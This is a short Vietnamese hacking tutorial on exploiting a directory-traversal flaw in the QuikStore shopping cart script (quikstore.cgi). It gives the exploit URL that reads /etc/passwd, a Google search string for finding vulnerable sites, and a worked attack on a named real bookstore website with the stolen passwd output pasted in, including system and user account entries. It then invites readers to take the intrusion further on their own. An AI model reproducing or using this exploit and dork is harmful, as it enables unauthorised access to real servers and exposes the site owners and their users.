Hack QuikStore Shopping Cart
trang này đã được đọc lầnLỗi của QuikStore Shopping Cart cho phép view bằng
cách xử dụng ../../../
File bị lỗi : quikstore.cgi
Cách khai thác
http://[target]/quikstore.cgi?category=<mặt hàng nào
đó>&template=../../../../../../../../../../../../etc/passwd
Cách tìm lỗi này có cả đống trên google, chỉ việc search cụm từ sau
allinurl: quikstore.cgi
Sau khi view được trên host thì mục tiêu tiếp theo cần phải làm gì và khai
thác tiếp như thế nào thì tùy mỗi người có cách khai thác riêng
Ví dụ một site mình lấy từ trên google
http://www.rootsandwingsbooks.com/quikstore.cgi?category=PEA&template=../../../../../../etc/passwd
Kết quả
CODE
root:*:0:1:system PRIVILEGED account:/:/bin/tcsh
nobody:*Nologin:65534:65534:anonymous NFS user:/:
nobodyV:*Nologin:60001:60001:anonymous SystemV.4 NFS user:/:
daemon:*:1:1:system background account:/: bin:*:3:4:system librarian
account:/bin: uucp::4:2:UNIX-to-UNIX
Copy:/usr/spool/uucppublic:/usr/lib/uucp/uucico uucpa::4:2:uucp adminstrative
account:/usr/lib/uucp: auth:*:6:11:Authentication Subsystem:/tcb/bin:
cron:*:7:14:Cron Subsystem:/usr/adm/cron: lp:*:8:12:Line Printer
Subsystem:/users/lp: tcb:*:9:18:Trusted Computing Base:/tcb:
adm:*:10:19:Administration Subsystem:/usr/adm: ris::11:21:Remote Installation
Services Account:/usr/adm/ris:/bin/sh wnn::12:1:Wnn System
Account:/tmp:/bin/sh cantelow:*:17:15:Ann
Cantelow1:/usr/users3/cantelow:/usr/bin/tcsh lanman::100:99:ASDU
Server:/usr/net/servers/lanman:/bin/false lmxadmin::200:99:ASDU Server
Administrator:/usr/lmxadmin:/bin/sh lmxguest:*:201:99:ASDU Server
Guest:/usr/users/lmxguest:/bin/false ... còn tiếp dài quá nên không chép ra